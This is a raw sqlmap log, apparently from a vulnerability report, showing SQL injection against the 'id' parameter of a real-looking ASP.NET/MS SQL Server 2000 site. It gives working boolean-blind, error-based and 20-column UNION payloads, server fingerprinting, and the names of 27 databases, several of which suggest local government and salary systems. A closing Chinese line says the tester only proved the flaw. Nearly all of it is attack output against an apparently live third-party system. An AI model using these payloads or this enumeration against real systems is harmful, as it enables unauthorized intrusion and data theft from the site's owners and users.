Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2234 AND 7027=7027 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=2234 AND 7870=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+ CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7870=7870) THEN CHAR(49) ELSE CHAR(48) E ND))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: id=2234 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,CHAR(113)+CHAR(122)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(105)+CHAR(102)+CH AR(83)+CHAR(68)+CHAR(81)+CHAR(83)+CHAR(70)+CHAR(83)+CHAR(74)+CHAR(101)+CHAR(113) +CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL-- --- [11:30:26] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 [11:30:26] [INFO] fetching database names [11:30:27] [INFO] heuristics detected web page charset 'GB2312' [11:30:27] [WARNING] the SQL query provided does not return any output [11:30:27] [WARNING] the SQL query provided does not return any output [11:30:27] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' or switch '--hex' [11:30:27] [INFO] fetching number of databases [11:30:27] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [11:30:27] [INFO] retrieved: [11:30:27] [ERROR] unable to retrieve the number of databases available databases [27]: [*] 2010sheyanggov [*] cqc_cansang [*] cqc_kcjq [*] cqc_stampol [*] cqc_syagri [*] cyylj [*] gswzwj [*] gz [*] gz201312 [*] gzweb [*] jiandu [*] jiangsu [*] jrbhdpt [*] master [*] model [*] msdb [*] newsheyang [*] Northwind [*] pubs [*] syb [*] tempdb [*] ybzx [*] ybzx_web [*] yccasdata [*] YGSalaryNet [*] zfxxgk [*] zfxxgksq 点到为止,未深入。证明漏洞即可。